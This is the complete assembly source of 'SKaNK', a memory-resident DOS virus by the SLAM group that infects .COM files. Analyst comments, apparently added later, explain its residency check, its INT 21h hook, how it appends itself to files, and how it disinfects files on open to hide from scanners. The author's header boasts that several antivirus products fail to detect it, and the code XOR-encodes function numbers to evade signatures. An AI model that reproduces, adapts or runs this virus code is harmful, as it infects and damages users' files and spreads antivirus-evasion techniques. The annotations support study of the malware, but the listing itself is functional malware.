SLAM3.008: SKaNK Virus v1.0 ~·eta Version~ Written by DC [SLAM]
;----------------------------------------------------------------------------
; SKaNK Virus v1.0 ~·eta Version~ Written by [DC]
;----------------------------------------------------------------------------
;
; ˛ TSR......... [YEAH]
; ˛ ENCRYPTED... [NOPE]
; ˛ COM......... [YEAH]
; ˛ EXE......... [NOPE]
; ˛ POLYMORPH... [NOPE]
;
;----------------------------------------------------------------------------
; ˛ Anti Virus Tests:
;----------------------------------------------------------------------------
;
; ˙ TBAV 7.07 - No Flags
; ˙ SCAN DOS/W95 - No Detection
; ˙ F-PROT - No Detection
; ˙ AVPRO - No Detection
;
;----------------------------------------------------------------------------
; ˛ Greetz
;----------------------------------------------------------------------------
;
; ˙ Nightmare Joker
; ˙ All [SLAM] Members
;
;----------------------------------------------------------------------------
;
;
; $$$, $$$$$$$$$$$$$. ' , ,
; $$$$$$$$$$$$$,,$$$$$$$$$$,' $$$ $$$$$ $ $ $$$$$
; $$$$$$$$$$$$$$$$',$$$$$$$$$$ $$$$$ '$$$$$$$$ $$$$$$$$'
; $$$$$$$$$ $$$$$$ $$$$$$$$$ '$$$$$' $$$$$$$$$$ $$$$$$$$$$
; $$$$$$$$ ' ',O $$$$$$$ $$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$
; $$$$$$ .'$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$o
; $$$$$$$$$,$$$ $$$$$$ $$$$$$$$$$$$$ $$$$$$$$$$^$$$$$$$$$$
; . $$$$,$$$$$$$,$ $$$$$$ ' $$$$$$$$$$' $$$$$$$$ poq $$$$$$$$
; $ ,$$$$$$$$$ $$$$$. $$$$$$$$$ $$$$$$$$$$ $$$$$$$$ o $$$$$$$$
; $$$$,$$,$$$$$$'$ '$$$$$$$'$$$$$$$$$$. $$$$$$$$$$ $$$$$$$ . $$$$$$$$
; $$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$,' $$$$$$$$$$$$ $$$$$$ $$$$$$$$
; $$$$$$$$$ ,$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$.$$$$$$$ '$$$$$$,
;
; [DC]
;
; Assembler setup for a flat .COM image (TASM/MASM syntax): tiny model,
; one code segment, `jumps` = TASM automatic jump-size extension, and
; `org 0` so every label is an offset relative to `startvirus`; the
; run-time delta computed at `next:` is added to reach variables once the
; body has been appended to a host at an arbitrary file offset.
.model tiny ; For .COM files
.code ; Code Segment
jumps
org 0 ; For Calculation of Offsets
;-----------------------------------------------------------------------
; startvirus — entry point of the appended body (and of the dropper).
; Analysis notes (defender view, taken from this listing):
;   1. Compute the delta offset into BP; variables are reached as
;      [bp+offset var] because the body sits at an arbitrary file offset.
;   2. Residency probe: INT 21h with AH=0Bh; the hook answers DI=99h
;      (see int21). The same probe identifies the resident code.
;   3. Otherwise: shrink the host's memory block, allocate a block for the
;      resident copy, hand-edit its MCB ('Z' = last block, owner field = 8,
;      the value DOS uses for its own blocks — presumably so memory-map
;      tools do not attribute it to a program), copy the body there, store
;      the old INT 21h vector into the copy, and point INT 21h at int21.
;   4. Restore the host's original first 3 bytes at CS:100h and jump there.
; DOS function numbers are built with assemble-time XOR expressions and
; decoded at run time, so literal `mov ah,4Ah` / `mov ax,4800h` byte
; patterns never appear in the image; signatures must key on other bytes.
;-----------------------------------------------------------------------
startvirus: ; Virus Begins here
call next ; jmp to next pass
next: pop bp ; Calculing the delta-offset
sub bp,offset next ; [bp] = delta offset now
push ds ; Save DS
push es ; Save ES
; --- residency probe: AH=0Bh is DOS "check STDIN status"; the resident
; --- hook answers with DI=99h instead of reaching DOS ---
mov ah,0bh ; Instalation check
int 21h ; on Interrupt 21h
cmp di,99h ; Already instaled?
jz done_install ; Yeah! return control file
; --- AH=4Ah (resize block) with BX=0FFFFh: DOS fails the call and reports
; --- the largest available size, in paragraphs, in BX ---
mov ah, 4Ah xor 49h ; crypt the function 4ah
xor ah, 49h ; decrypt it
mov bx, 0FFFFh
int 21h ; Call interrupt 21h
; leave room for the body (rounded up to paragraphs) plus one MCB paragraph
sub bx, (endheap - startvirus + 15)/16 + 1
mov ax, 4A00h xor 4900h ; Alter Memory
xor ax, 4900h
int 21h
; --- AH=48h: allocate the block that will hold the resident copy ---
mov ax, 4800h xor 4700h ; Allocate memory
xor ax, 4700h
mov bx,(endheap - startvirus + 15)/16
int 21h
mov es, ax ; ES=PSP
dec ax ; AX=MCB
mov ds, ax ; DS=AX=MCB
; MCB byte 0 = 'Z' (last block in the chain), word 1 = owner; 8 is the
; owner value DOS uses for its own blocks (author: "It's a DOS prg.")
mov byte ptr ds:[0], 'Z' ; Mark the end
mov word ptr ds:[1], 8 ; It's a DOS prg.
; --- copy the running body (DS:BP with DS=CS) to ES:0, word by word ---
push cs ; CS=Code Segment
pop ds ; DS=CS
xor di,di ; DI=0
mov cx,(heap-startvirus)/2+1 ; Bytes to move
mov si,bp ; BP=STARTVIRUS
rep movsw ; Move CS:[SI] to ES:[DI]
; --- CX is 0 after rep movsw, so DS=0 addresses the interrupt vector
; --- table. The old INT 21h vector is written into the RESIDENT copy
; --- (ES:oldint21), which is the far-jump target used by `exit`. ---
mov ds,cx ; CX=0 DS=CX (interrupt table)
push ds
mov ax,word ptr ds:[21h*4] ; No Flags with TBAV
mov word ptr es:oldint21,ax ; Ditto
mov ax,word ptr ds:[21h*4+2] ; Ditto
mov word ptr es:oldint21+2,ax ; Ditto
pop ds ; DS=0
; --- AH=25h set vector: INT 21h := DS:DX = resident segment : int21 ---
; --- (AX is loaded as 2125h and swapped to 2521h at run time) ---
push es ; ES=Virus Segment
pop ds ; DS=ES
mov ax,2125h ; No [Flags] with TBAV
xchg ah,al ; AX=2125h
lea dx,int21 ; AH_AL = AL_AH
int 21h ; 21_25 = 25_21 [Set Vector]
; --- hand control back to the host program ---
done_install:
pop es ; Restore Original ES
pop ds ; Restore Original DS
; Only 3 bytes are put back (one byte + one word), matching save3's size.
; SI is loaded here but not used below, and the pushed 100h stays on the
; stack because control is transferred with JMP AX, not RET.
lea si,[bp+offset save3] ; First 5 original bytes
mov di,100h ; of COM file.
push di ; For later ret's
mov ah,byte ptr [bp+offset save3]
mov byte ptr cs:[100h],ah ; No Flags with TBAV
mov ax,word ptr [bp+offset save3+1]
mov word ptr cs:[101h],ax ; Flag = 'O' More/Overwrite
; Program in Memory
mov ax,200h ; Move AX=200h
shr ax,1 ; Divide ax by 2
; AX=100h [TBAV can't flag]
jmp ax ; Jump to CS:100h
;-----------------------------------------------------------------------
; int21h — emulate an INT 21h straight into the original DOS handler.
; PUSHF + far CALL through cs:[oldint21] mimics the INT stack frame, so
; the original handler's IRET returns here. infectfile and disinfect use
; it for their own open calls (AX=3D02h), which would otherwise be caught
; again by the hook's AH=3Dh check and recurse.
;-----------------------------------------------------------------------
int21h:
pushf ; Save Flags
call dword ptr cs:[oldint21] ; Call Interrupt 21h
ret ; Return
;-----------------------------------------------------------------------
; int21 — the resident INT 21h hook (installed with AH=25h in startvirus).
; AH=0Bh is answered here without reaching DOS: DI=99h, then IRET. That
; is the residency marker a scanner can probe for (DOS's own AH=0Bh
; callers see DI clobbered). Every other call continues at notinstall.
; The two strings below are data placed between code paths; the jnz skips
; over them so they never execute, and they travel into every infected
; file with the rest of the body — a stable string marker.
;-----------------------------------------------------------------------
int21:
cmp ah,0bh ; Installation check?
jnz notinstall ; No? Check others functions
mov di,99h ; DI=99h! Already In!
iret ; Interrupt Return
v_name db "SKANK",0
v_author db "(C) Dark Chakal [SLAM]",0
;-----------------------------------------------------------------------
; notinstall — dispatch for every INT 21h call that is not the residency
; probe. Flags and all registers are saved, then:
;   AX = 4B00h (EXEC program)  -> infectfile  (compared as 004Bh after
;                                 xchg ah,al, so 4B00h is not a literal)
;   AH = 3Dh   (open handle)   -> disinfect
;   anything else              -> exithandler
; exithandler restores everything; `exit` is a far JMP (opcode EAh) whose
; 4-byte target `oldint21` is patched at install time, so the call chains
; to the original DOS handler with the caller's registers intact.
; Defender note: while resident, every program launch and every file open
; on the machine passes through this code.
;-----------------------------------------------------------------------
notinstall:
pushf ; Push All necessary registers
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
xchg ah,al ; AX=AH_AL = NOW = AX=AL_AH
cmp ax,004bh ; Execute?
xchg ah,al ; Return to normal
jz infectfile ; Yeah! Infect the file DS:DX
cmp ah,3dh ; Open File?
jz disinfect ; Disinfect NOW!
exithandler:
pop es ; Pop All "PUSHED" registers
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
exit:
; far JMP target; the 4 bytes below are code-as-data patched at install
db 0eah ; jmp far ptr instruction
oldint21 dd ? ; to original interrupt 21h
;-----------------------------------------------------------------------
; disinfect — runs on every AH=3Dh open while resident (DS:DX = caller's
; path). Opens the same file read/write, reads its first 4 bytes and, if
; the file starts with E9h (JMP) and its size equals jump target + 564 + 3,
; treats it as infected and rewrites it:
;   - reads the 3 bytes stored at end-of-file minus 3 (host header),
;   - writes them back at offset 0,
;   - truncates the file at size - 564 (a write with CX=0),
;   - restores the file date/time (AX=5701h) and closes.
; Files starting with 'Z' or 'M' (EXE signatures) are left alone.
; Defender note: this is stealth-like behaviour — a file opened by another
; tool (e.g. an on-demand scanner) is returned to its host form on disk,
; so on-disk results are unreliable while the hook is resident; establish
; residency first (memory scan or the AH=0Bh / DI=99h probe).
; Note: the body length is the literal 564 on this path, whereas
; infectfile uses the assembled expression endheap-startvirus; whether the
; two agree depends on the build — TODO confirm against the assembled size.
;-----------------------------------------------------------------------
disinfect:
; open via the original handler (bypasses this hook) — handle ends in BX
mov ax,3d02h ; Open File
call int21h
xchg ax,bx ; XCHG is more faster than MOV
; save the file's date/time so the rewrite leaves the timestamp unchanged
mov ax,5700h ; Get Date/Time
int 21h
push cx ; Save time
push dx ; Save date
; read the 4-byte header: skip EXE ('Z'/'M'), require a JMP (E9h)
mov ah,3fh ; Read
lea dx,buffer ; To buffer
mov cx,4 ; 4 bytes (for speed)
int 21h
cmp byte ptr buffer,"Z" ; no flag!
jz disinf_close ; EXE? yeah, exit
cmp byte ptr buffer,"M" ; no flag!
jz disinf_close ; EXE? yeah, exit
cmp byte ptr buffer,0e9h ; A jump instruction????
jnz disinf_close ; No?? exit
; infected iff file size (AX after seek-to-end) == jump target + 564 + 3
mov ax,4202h ; Go to end of file
xor cx,cx ; CX = High Word
xor dx,dx ; DX = LoW Word
int 21h
mov cx,word ptr buffer+1 ; CX = Offset of jump
add cx,564+3 ; Add cx, size of virus+3
cmp ax,cx ; AX=CX???
jnz disinf_close ; No?? exit
jmp disinf ; Is infected! Disinfect now!
; common exit: put the date/time back (AX=5701h = set), close, return
disinf_close:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3eh ; close file
int 21h
jmp exithandler ; exithandler
; restore the host: 3 original bytes are kept at EOF-3 (in save3 of the
; appended body); copy them to offset 0, then cut the body off the end
disinf: mov dx,ax ; dx = filesize
push dx ; save dx
sub dx,3 ; subtract 3 of filesize
xor cx,cx ; cx=0
mov ax,4200h ; seek file
int 21h
mov ah,3fh ; Read
lea dx,buffer ; to Buffer
mov cx,3 ; 3 bytes
int 21h
mov ax,4200h ; go to start of file
xor cx,cx ; CX=0
xor dx,dx ; DX=0
int 21h
mov ah,40h xor 39h ; Ok! FUCK TBAV!!!
xor ah,39h ; Decrypt AH
lea dx,buffer ; Buffer to Write
mov cx,3 ; 3 original bytes from file
int 21h
; seek to size - 564 and write 0 bytes: DOS truncates the file there
pop dx ; Restore DX (filesize)
sub dx,564 ; Subtract virus size from filesize
xor cx,cx ; CX=0
mov ax,4200h ; go to start of file
int 21h
mov ah,40h xor 39h ; Ok! FUCK TBAV!!!
xor ah,39h ; Decrypt AH
xor cx,cx ; Truncate file.
int 21h
jmp disinf_close ; close file
;-----------------------------------------------------------------------
; infectfile — runs on AX=4B00h (EXEC) with DS:DX = path of the program
; about to be started.
; Target selection: scan the path for '.', then require "COM" in upper
; case exactly (a lower-case ".com" does not match and is not infected).
; Skipped: files whose first byte is 'Z' or 'M' (EXE headers), files
; already infected (jump target + body size + 3 == file size), and files
; larger than 65535 - body size (would overflow the 64 KiB .COM image).
; On-disk layout of an infected file (what a scanner sees):
;   offset 0    : E9h, word (size-3)      JMP to the appended body
;   offset 3..  : rest of the original host, unchanged
;   end         : the image startvirus..endheap, whose `save3` holds the
;                 host's original first 3 bytes (restored at run time)
; Timestamps: the `already` path issues AX=5700h (get date/time) with the
; saved CX/DX rather than 5701h (set); as written the original date/time
; is not put back, so an infected file's timestamp reflects the infection
; time — presumably a slip (TODO confirm), but a usable forensic indicator.
;-----------------------------------------------------------------------
infectfile:
mov si,dx ; Si=Offset of Filename
; --- extension check: find '.', then exactly "COM" (upper case) ---
check_name:
lodsb ; AL = Byte of Filename
or al,al ; End of File?
jz exithandler ; Yes, no extension! exit
cmp al,"." ; "."???
jnz check_name ; No! Loop to check_it
lodsw ; LOAD a WORD from DS:[SI] to AX
cmp ax,"OC" ; AX = "CO"
jnz exithandler ; No COM file? exit
lodsb ; Load the last byte
cmp al,"M" ; is "M" = COM
jnz exithandler ; No! exit
; --- open via the original handler (bypasses this hook); handle in BX ---
mov ax,3d02h ; Open file for read/write
call int21h ; Do it!
xchg ax,bx ; More Faster than "MOV BX,AX"
infect_2:
; save date/time; then DS=ES=CS so buffer/save3 refer to the resident copy
mov ax,5700h ; Get the Original Date/Time
call int21h ; Do it!
push cx ; Save time
push dx ; Save date
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
; read the first 5 bytes of the host into buffer
mov ah,3fh ; Read a Bytes to DS:DX
mov dx,offset buffer ; DS:DX = Buffer
mov cx,5 ; 5 bytes [For Speed]
call int21h
cmp byte ptr buffer,'Z' ; Only 'Z' = NOFLAG
jz done_file
cmp byte ptr buffer,'M' ; Only 'M' = NOFLAG
jz done_file
; seek to end: AX = low word of file size (file pointer now at EOF)
mov ax,4202h ; Go to end of file
xor cx,cx
xor dx,dx
int 21h
; already infected iff size == (word at offset 1) + body size + 3
mov cx,word ptr buffer+1 ; CX = Offset of jump
add cx,endheap-startvirus+3 ; ADD CX the size of virus+3
cmp ax,cx ; Equal to filesize??
jz done_file ; Yes, Already infected!
jmp checkCOM ; Jump to Check COM file
checkCOM:
; refuse hosts that would exceed the 64 KiB .COM limit after appending
cmp ax,65535-(endheap-startvirus) ; Is a BIG File????
ja done_file ; Yes, exit
jmp infect_com ; Else infect_now!
; --- common exit: close, then the date/time call described above ---
done_file:
mov ah,3eh ; Close file
call int21h
already:
mov ax,5700h ; Get Time
pop dx ; Restore date
pop cx ; Restore time
call int21h ; call int21
jmp exithandler ; exit
; --- build the new header: keep the host's first 3 bytes in save3 (so
; --- they travel with the body), then buffer := E9h, word (size - 3) ---
infect_com: ; AX = Saved file Size
sub ax,3 ; Subtract by 3
mov si,offset buffer ; Save it on return buffer
mov di,offset save3 ; DI = Return Buffer
movsw ; Move a WORD [2 bytes]
movsb ; Move a Byte [1 byte]
mov byte ptr buffer,0e9h ; Make the jump instruction
mov word ptr buffer+1,ax ; Adjust the jump location
finishinfection:
; append the whole image startvirus..endheap at EOF (pointer is at end)
lea dx,startvirus ; DX = Startvirus
mov cx,endheap-startvirus ; Size of Virus
mov ah,40h xor 39h ; 40 xor 39h ! [TBAV can't flag]
xor ah,39h ; xor 39h again! returned to normal
call int21h ; do it! interrupt 21h
; rewind (CWD with AX=4200h gives DX=0) and overwrite the header. 5 bytes
; are written, but buffer[3..4] still hold the host's own bytes from the
; earlier read, so only the first 3 bytes of the host actually change.
mov ax,4200h ; Move file pointer
xor cx,cx ; to start of file
cwd ; little and fast
call int21h ; do it!
mov ah,40h xor 39h ; Write to file
xor ah,39h
mov dx,offset buffer ; Write from buffer
mov cx,5 ; 3 bytes to write
call int21h
jmp done_file ; End of infection
; Variables sit at the end of the body so the image appended to each file
; carries its own copy. `buffer` is scratch for the 4/5-byte header reads
; and writes; `save3` holds the host's original first 3 bytes — in the
; dropper it is INT 20h (CDh 20h = DOS terminate), so "returning" to the
; host just exits. `endheap` bounds what is copied resident and appended
; to files (endheap-startvirus = body length).
buffer db 6 dup (?) ; a smaller buffer.
save3 db 0cdh,20h,0 ; First bytes of COM File
heap: ; I didn't like the variables
endheap: ; in the code!
; ENDHEAP - end of virus
end startvirus ; for calculations